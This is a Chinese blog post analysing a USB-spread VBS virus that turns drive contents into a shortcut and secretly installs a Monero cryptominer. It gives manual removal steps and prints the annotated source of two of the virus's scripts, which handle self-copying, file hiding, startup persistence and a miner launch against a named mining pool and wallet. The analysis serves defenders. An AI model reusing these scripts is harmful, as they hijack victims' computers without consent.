<!doctype html>



  


<html class="theme-next mist use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  
  
  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="http://fonts.geekzu.org/css?family=Droid+Serif:400italic,700italic,400,700/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.0.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="U盘病毒,vbs病毒" />








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.0.1" />






<meta name="description" content="近期在学校周围火速窜起一种将U盘文件变为一个以U盘名字命名的快捷方式的病毒。貌似传染速度非常快，以下是解决方式及病毒原理的基本分析
哇，这个病毒，在感染者电脑植入挖矿程序，变比特币矿机，好恶心。对文件没损坏，但是对电脑性能会有很大影响
核心指令：“tcp://xmr.crypto-pool.fr:3333 -u 42Damq6yzG5JteZ3wxZNkuKj6onDw9T27QoPxeBpv8i">
<meta property="og:type" content="article">
<meta property="og:title" content="movemenoreg.vbs病毒的处理">
<meta property="og:url" content="http://yoursite.com/2016/12/31/movemenoreg/index.html">
<meta property="og:site_name" content="zer0like's Blog">
<meta property="og:description" content="近期在学校周围火速窜起一种将U盘文件变为一个以U盘名字命名的快捷方式的病毒。貌似传染速度非常快，以下是解决方式及病毒原理的基本分析
哇，这个病毒，在感染者电脑植入挖矿程序，变比特币矿机，好恶心。对文件没损坏，但是对电脑性能会有很大影响
核心指令：“tcp://xmr.crypto-pool.fr:3333 -u 42Damq6yzG5JteZ3wxZNkuKj6onDw9T27QoPxeBpv8i">
<meta property="og:updated_time" content="2016-12-31T02:23:14.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="movemenoreg.vbs病毒的处理">
<meta name="twitter:description" content="近期在学校周围火速窜起一种将U盘文件变为一个以U盘名字命名的快捷方式的病毒。貌似传染速度非常快，以下是解决方式及病毒原理的基本分析
哇，这个病毒，在感染者电脑植入挖矿程序，变比特币矿机，好恶心。对文件没损坏，但是对电脑性能会有很大影响
核心指令：“tcp://xmr.crypto-pool.fr:3333 -u 42Damq6yzG5JteZ3wxZNkuKj6onDw9T27QoPxeBpv8i">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Mist',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 0,
      author: '博主'
    }
  };
</script>

  <title> movemenoreg.vbs病毒的处理 | zer0like's Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  










  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">zer0like's Blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle">2333</p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      

      
    </ul>
  

  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                movemenoreg.vbs病毒的处理
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-12-31T03:29:54+08:00" content="2016-12-31">
              2016-12-31
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/瞎玩/" itemprop="url" rel="index">
                    <span itemprop="name">瞎玩</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/2016/12/31/movemenoreg/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="2016/12/31/movemenoreg/" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          

          
              &nbsp; | &nbsp;
              <span class="page-pv">本文总阅读量
              <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>次
              </span>
          
        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>近期在学校周围火速窜起一种将U盘文件变为一个以U盘名字命名的快捷方式的病毒。<br>貌似传染速度非常快，以下是解决方式及病毒原理的基本分析</p>
<p><strong>哇，这个病毒，在感染者电脑植入挖矿程序，变比特币矿机，好恶心。对文件没损坏，但是对电脑性能会有很大影响</strong></p>
<p>核心指令：“tcp://xmr.crypto-pool.fr:3333 -u 42Damq6yzG5JteZ3wxZNkuKj6onDw9T27QoPxeBpv8ira5s7cZLS2Yz7KqwRD6ok4bjYp6PWkAiJMKjuQXo3wUh8PJ8JFwE -p x -lowcpu 2 -dbg -1”</p>
<a id="more"></a>
<h3 id="0x01-最简单的解决方式"><a href="#0x01-最简单的解决方式" class="headerlink" title="0x01 最简单的解决方式"></a>0x01 最简单的解决方式</h3><hr>
<p>一个台湾大神根据这种病毒制作了一个USBVirusKiller软件，直接可以进行清理<br>百度云链接：链接: <a href="https://pan.baidu.com/s/1dFxaz3j" target="_blank" rel="external">https://pan.baidu.com/s/1dFxaz3j</a> 密码: kh7p</p>
<h3 id="0x02-病毒特征及其感染范围"><a href="#0x02-病毒特征及其感染范围" class="headerlink" title="0x02 病毒特征及其感染范围"></a>0x02 病毒特征及其感染范围</h3><hr>
<p>vbs病毒：利用vb(virtual basic)的脚本语言vbs编写的病毒程序，具有简单易懂，可修改性强的特点。顾其感染范围也限制在<code>Window</code>平台的电脑上。</p>
<p>中毒后的U盘目录结构：</p>
<p>[未隐藏] <strong><code>U盘名.lnk</code></strong>                快捷方式   病毒启动点</p>
<p>[隐&emsp;藏] <strong><code>_</code></strong>                     文件夹      包含U盘里的原始文件</p>
<p>[隐&emsp;藏] <strong><code>WindowsServices</code></strong>      文件夹      包含以下病毒流程文件</p>
<ul>
<li>install.vbs</li>
<li>helper.vbs</li>
<li>movemenoreg.vbs</li>
</ul>
<h3 id="0x03-一般处理步骤"><a href="#0x03-一般处理步骤" class="headerlink" title="0x03 一般处理步骤"></a>0x03 一般处理步骤</h3><hr>
<p>1.<strong>[插入U盘后没有点击.lnk文件]</strong>只要在window或者mac上直接勾选显示隐藏文件，将<code>WindowsServices文件夹</code>和<code>.lnk</code>文件直接删除即可去除病毒，同时将<code>_文件夹</code>下的内容拷贝出来。<br>2.<strong>[插入U盘后点击了.lnk文件]</strong>处理步骤分以下几步：<br>&emsp;&ensp;2.1 先将U盘内病毒文件删除。<br>&emsp;&ensp;2.2 <code>ctl+Alt+Del</code> 调出任务管理器，将<code>helper.vbs</code>进程终止。<br>&emsp;&ensp;2.3 <code>window + r</code> 输入%AppData%，在打开的文件夹里勾选显示隐藏文件，会看到<code>WindowsServices文件夹</code>将该文件夹内容删除。<br>&emsp;&ensp;2.4 <code>window + r</code> 输入shell:startup ，将里面的helper的快捷方式删除。<br>&emsp;&ensp;2.5 至此处理完成</p>
<h3 id="0x04-vbs病毒源码的简单分析"><a href="#0x04-vbs病毒源码的简单分析" class="headerlink" title="0x04 vbs病毒源码的简单分析"></a>0x04 vbs病毒源码的简单分析</h3><hr>
<figure class="highlight vb"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br></pre></td><td class="code"><pre><span class="line">`movemenoreg.vbs</span><br><span class="line"><span class="keyword">on</span> <span class="keyword">error</span> <span class="keyword">resume</span> <span class="keyword">next</span></span><br><span class="line"><span class="keyword">Dim</span>  strPath, objws, objFile, strFolder, Target, SourceFolder, destFolder, objDestFolder, AppData, ws, objmove, pfolder, objWinMgmt, colProcess, vaprocess</span><br><span class="line"></span><br><span class="line">`创建WScript对象</span><br><span class="line"><span class="keyword">Set</span> ws = WScript.CreateObject(<span class="string">"WScript.Shell"</span>) </span><br><span class="line"></span><br><span class="line">`定义作用目录</span><br><span class="line">Target = <span class="string">"\WindowsServices"</span> </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">'where are we?</span></span><br><span class="line">strPath = WScript.ScriptFullName</span><br><span class="line"></span><br><span class="line">`创建文件对象</span><br><span class="line"><span class="keyword">set</span> objws = CreateObject(<span class="string">"Scripting.FileSystemObject"</span>)</span><br><span class="line"></span><br><span class="line">`获取strPath位置指定的file </span><br><span class="line"><span class="keyword">Set</span> objFile = objws.GetFile(strPath)</span><br><span class="line"></span><br><span class="line">`获取父文件夹的名字</span><br><span class="line">strFolder = objws.GetParentFolderName(objFile)</span><br><span class="line">pfolder = objws.GetParentFolderName(strFolder)</span><br><span class="line"></span><br><span class="line">`将pfolder的内容拷贝到\_下，即移动U盘文件</span><br><span class="line">ws.Run pfolder &amp; <span class="string">"\_"</span></span><br><span class="line"></span><br><span class="line">`用AppData指向%AppData%目录</span><br><span class="line">AppData = ws.ExpandEnvironmentStrings(<span class="string">"%AppData%"</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">`定义目标文件目录</span><br><span class="line">DestFolder = AppData &amp; Target</span><br><span class="line"></span><br><span class="line">`定义病毒源文件目录</span><br><span class="line">SourceFolder = strFolder</span><br><span class="line"></span><br><span class="line">`判断目标目录的文件是否存在，不存在则创建</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">not</span> objws.folderexists(DestFolder)) <span class="keyword">then</span></span><br><span class="line">	objws.CreateFolder DestFolder	</span><br><span class="line">	<span class="keyword">Set</span> objDestFolder = objws.GetFolder(DestFolder)</span><br><span class="line">	objDestFolder.Attributes = objDestFolder.Attributes + <span class="number">2</span></span><br><span class="line"><span class="keyword">end</span> <span class="keyword">if</span></span><br><span class="line"></span><br><span class="line">`利用movenandhide 函数处理病毒源文件</span><br><span class="line"><span class="keyword">Call</span> moveandhide (<span class="string">"\helper.vbs"</span>)</span><br><span class="line"><span class="keyword">Call</span> moveandhide (<span class="string">"\installer.vbs"</span>)</span><br><span class="line"><span class="keyword">Call</span> moveandhide (<span class="string">"\movemenoreg.vbs"</span>)</span><br><span class="line"><span class="keyword">Call</span> moveandhide (<span class="string">"\WindowsServices.exe"</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">`moveandhide函数定义</span><br><span class="line"><span class="keyword">sub</span> moveandhide (name)</span><br><span class="line">	`判断name文件是否存在于DestFloder,不存在则从SourceFloder拷贝过去</span><br><span class="line">	<span class="keyword">if</span> (<span class="keyword">not</span> objws.fileexists(DestFolder &amp; name)) <span class="keyword">then</span></span><br><span class="line">		objws.CopyFile strFolder &amp; name, DestFolder &amp; <span class="string">"\"</span></span><br><span class="line">		<span class="keyword">Set</span> objmove = objws.GetFile(DestFolder &amp; name)</span><br><span class="line">		`设置attributes让文件隐藏</span><br><span class="line">		<span class="keyword">If</span> <span class="keyword">not</span> objmove.Attributes <span class="keyword">AND</span> <span class="number">2</span> <span class="keyword">then</span> </span><br><span class="line">			objmove.Attributes = objmove.Attributes + <span class="number">2</span></span><br><span class="line">		<span class="keyword">end</span> <span class="keyword">if</span></span><br><span class="line">	<span class="keyword">end</span> <span class="keyword">if</span></span><br><span class="line"><span class="keyword">end</span> <span class="keyword">sub</span></span><br><span class="line"></span><br><span class="line">`利用WMI获取系统信息</span><br><span class="line"><span class="keyword">Set</span> objWinMgmt = GetObject(<span class="string">"WinMgmts:Root\Cimv2"</span>)</span><br><span class="line">`获取系统所有进程列表子项。</span><br><span class="line"><span class="keyword">Set</span> colProcess = objWinMgmt.ExecQuery (<span class="string">"Select * From Win32_Process where name = 'wscript.exe'"</span>)</span><br><span class="line"></span><br><span class="line">`循环检查如果helper.vbs已启动则退出WScript</span><br><span class="line"><span class="keyword">For</span> <span class="keyword">Each</span> objProcess <span class="keyword">In</span> colProcess</span><br><span class="line">	vaprocess = objProcess.CommandLine</span><br><span class="line">		<span class="keyword">if</span> instr(vaprocess, <span class="string">"helper.vbs"</span>) <span class="keyword">then</span></span><br><span class="line">			WScript.quit</span><br><span class="line">		<span class="keyword">End</span> <span class="keyword">if</span></span><br><span class="line"><span class="keyword">Next</span></span><br><span class="line"></span><br><span class="line">`启动</span><br><span class="line">ws.Run DestFolder &amp; <span class="string">"\helper.vbs"</span></span><br><span class="line"></span><br><span class="line">置ws为空</span><br><span class="line"><span class="keyword">Set</span> ws = <span class="literal">Nothing</span></span><br></pre></td></tr></table></figure>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line">`helper.vbs</span><br><span class="line">on error resume next</span><br><span class="line">Dim ws, sParams, strPath, objws, objFile, strFolder, startupPath, MyScript, objWinMgmt, colProcess, vaprocess, miner</span><br><span class="line">`创建ws</span><br><span class="line">Set ws = WScript.CreateObject("WScript.Shell")</span><br><span class="line"></span><br><span class="line">`哇，，这个病毒。。我的天，，这是把你电脑当成挖比特币的矿机了，，</span><br><span class="line">sParams = "-o stratum+tcp://xmr.crypto-pool.fr:3333 -u 42Damq6yzG5JteZ3wxZNkuKj6onDw9T27QoPxeBpv8ira5s7cZLS2Yz7KqwRD6ok4bjYp6PWkAiJMKjuQXo3wUh8PJ8JFwE -p x -lowcpu 2 -dbg -1"</span><br><span class="line"></span><br><span class="line">`利用WMI获取系统信息</span><br><span class="line">Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")</span><br><span class="line"></span><br><span class="line">`获取路径</span><br><span class="line">strPath = WScript.ScriptFullName</span><br><span class="line"></span><br><span class="line">`创建文件对象</span><br><span class="line">set objws = CreateObject("Scripting.FileSystemObject")</span><br><span class="line"></span><br><span class="line">`获取病毒文件</span><br><span class="line">Set objFile = objws.GetFile(strPath)</span><br><span class="line">strFolder = objws.GetParentFolderName(objFile)</span><br><span class="line"></span><br><span class="line">strPath = strFolder &amp; "\"</span><br><span class="line"></span><br><span class="line">`植入开机启动项</span><br><span class="line">startupPath = ws.SpecialFolders("startup")</span><br><span class="line"></span><br><span class="line">`植入恶意挖矿程序</span><br><span class="line">miner = Chr(34) &amp; strPath &amp; "WindowsServices.exe" &amp; Chr(34) &amp; sParams</span><br><span class="line"></span><br><span class="line">`启动</span><br><span class="line">'ws.Run miner , 0</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">MyScript = "helper.vbs"</span><br><span class="line"></span><br><span class="line">`创建开机启动lnk</span><br><span class="line">While True</span><br><span class="line">If (not objws.fileexists(startupPath &amp; "\helper.lnk")) then</span><br><span class="line">	Set link = ws.CreateShortcut(startupPath &amp; "\helper.lnk")</span><br><span class="line">	link.Description = "helper"</span><br><span class="line">	link.TargetPath = strPath &amp; "helper.vbs"</span><br><span class="line">	link.WorkingDirectory = strPath</span><br><span class="line">	link.Save</span><br><span class="line">End If</span><br><span class="line"></span><br><span class="line">`获取子进程</span><br><span class="line">Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")</span><br><span class="line"></span><br><span class="line">`检查install.vbs是否执行</span><br><span class="line">call procheck(colProcess, "installer.vbs")</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%WindowsServices.exe%'")</span><br><span class="line"></span><br><span class="line">`查挖矿程序是否启动，没启动则启动</span><br><span class="line">if colProcess.count = 0 then</span><br><span class="line">	ws.Run miner, 0</span><br><span class="line">end if</span><br><span class="line">WScript.Sleep 5000</span><br><span class="line">Wend</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">`检查函数</span><br><span class="line">sub procheck(checkme, procname)</span><br><span class="line"></span><br><span class="line">For Each objProcess In checkme</span><br><span class="line">	vaprocess = objProcess.CommandLine</span><br><span class="line">	</span><br><span class="line">		if instr(vaprocess, procname) then</span><br><span class="line">			Exit sub</span><br><span class="line">		End if</span><br><span class="line">	</span><br><span class="line">Next</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ws.Run strPath &amp; procname</span><br><span class="line">end sub</span><br></pre></td></tr></table></figure>
<h3 id="0x05-vbs病毒启动流程"><a href="#0x05-vbs病毒启动流程" class="headerlink" title="0x05 vbs病毒启动流程"></a>0x05 vbs病毒启动流程</h3><hr>
<h3 id="0x06"><a href="#0x06" class="headerlink" title="0x06"></a>0x06</h3><hr>

      
    </div>

    <div>
      
        
      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2016/06/07/网络原理之数据链路层/" rel="next" title="网络原理之数据链路层">
                <i class="fa fa-chevron-left"></i> 网络原理之数据链路层
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div class="ds-thread" data-thread-key="2016/12/31/movemenoreg/"
           data-title="movemenoreg.vbs病毒的处理" data-url="http://yoursite.com/2016/12/31/movemenoreg/">
      </div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.jpg"
               alt="zer0like" />
          <p class="site-author-name" itemprop="name">zer0like</p>
          <p class="site-description motion-element" itemprop="description">personal_blog</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">8</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="http://weibo.com/zer0like" target="_blank" title="微博">
                  
                    <i class="fa fa-fw fa-globe"></i>
                  
                  微博
                </a>
              </span>
            
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-最简单的解决方式"><span class="nav-number">1.</span> <span class="nav-text">0x01 最简单的解决方式</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-病毒特征及其感染范围"><span class="nav-number">2.</span> <span class="nav-text">0x02 病毒特征及其感染范围</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x03-一般处理步骤"><span class="nav-number">3.</span> <span class="nav-text">0x03 一般处理步骤</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x04-vbs病毒源码的简单分析"><span class="nav-number">4.</span> <span class="nav-text">0x04 vbs病毒源码的简单分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x05-vbs病毒启动流程"><span class="nav-number">5.</span> <span class="nav-text">0x05 vbs病毒启动流程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x06"><span class="nav-number">6.</span> <span class="nav-text">0x06</span></a></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2016</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">zer0like</span>
</div>

<div class="powered-by">
  由 <a class="theme-link" href="http://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>

        

<div class="busuanzi-count">

  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">本站访客数<span class="busuanzi-value" id="busuanzi_value_site_uv"></span>人次</span>
  

  
    <span class="site-pv">本站总访问量<span class="busuanzi-value" id="busuanzi_value_site_pv"></span>次</span>
  
  
</div>



        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"zer0like"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
  






  
  
  
  <script type="text/x-mathjax-config">
    MathJax.Hub.Config({
      tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
      }
    });
  </script>

  <script type="text/x-mathjax-config">
    MathJax.Hub.Queue(function() {
      var all = MathJax.Hub.getAllJax(), i;
      for (i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';
      }
    });
  </script>
  <script type="text/javascript" src="//cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>


  

  

</body>
</html>
